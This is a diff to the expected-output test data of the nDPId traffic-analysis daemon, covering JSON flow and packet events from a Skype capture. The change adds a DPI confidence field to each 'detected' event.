 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431970679995,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970679995,"pkt":"0NQSxnP1PBXCt3IOCABFAAA12TQAAEARDmTAqAEinTg0HTLdnEoAIVxje7ECiU\/XVCamnPFSSydeUAuZRUP3ucHK0w=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1187,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1431970680899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431970680899,"pkt":"0NQSxnP1PBXCt3IOCABFAABKn9sAAEARV1TAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1188,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1431970680899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431970680899,"pkt":"0NQSxnP1PBXCt3IOCABFAABKCR0AAEAR7hLAqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2XQAAEARDgvAqAEinTg0KzLdnEYALMh9e7MC2jL0tZM0Yzvr0KHAzi3oveeicB3qmta1c4OVExZFkpM\/"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1sl0AAEARTKHAqAEib91KEjLdgQkAIR6we7UCnzLS60tunXakNuMsocCUgSoxAT5iGw=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/HVAAAEARe03AqAEiQTffDzLdnF4AK6Bke7cC41QXoMCqTrFc3jjyFt76m6sxlqO9wK+EPcEKNtA\/tkI="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1431970681909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431970681909,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnmgAAEARWMfAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1431970681909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431970681909,"pkt":"0NQSxnP1PBXCt3IOCABFAABKbIIAAEARiq3AqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3frUAAEARsN7AqAEi1cezkDLdnEkAIwRMe7kCZypNkc74yL7GF7GC5QinylqI\/WPnVsk+"}
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaTkAAEARlaPAqAEib91KKDLdnFkALS1Je7sCEGG8jv3asKVduW1KlINShpl5CYZ6daDh4AHUflFCiwcMag=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7SRAAEAGAv\/AqAEinTfrkshMnFVVB2sVAAAAALAC\/\/9GzAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -726,10 +726,10 @@
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABARUhAAEAGeZjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8xegAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ToQAAEARSoLAqAEinTeCrzLdnEYAIsBye70C0WV2Jw2JJv9T381tb7aFs7ugTny6Jk4="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmw8AAEARYEjAqAEib91NrTLdnEwALft7e78CS2barOC4bSdle3ySCU4isieKFyYrhir3D1S\/zus1mmpuRQ=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1431970683043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970683043,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIpxVyEzh8Ob8VQdrFqASOJAqmgAAAgQFrAQCCApMYN9LPjJCqwEDAwk="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1431970683044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970683044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JNdAAEAGy1jAqAEinTfrkshMnFVVB2sW4fDm\/YAQECyBfAAAAQEICj4yQvNMYN9L"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1431970683053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970683053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxayE3JOyrZSZGeOqASOJDTSQAAAgQFrAQCCApMXOO6PjJCqwEDAwk="}
@@ -739,13 +739,13 @@
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1431970683978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970683978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGihAAEAGpLjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8tkQAAAgQFtAEDAwUBAQgKPjJGlAAAAAAEAgAA"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8i9IAAEARpC3AqAEinTfrrzLdnFcAKG0ve8ECvWqBesxtVN\/+FF8A8FJFXO0bTxFAGhtLbx9IUYU="}
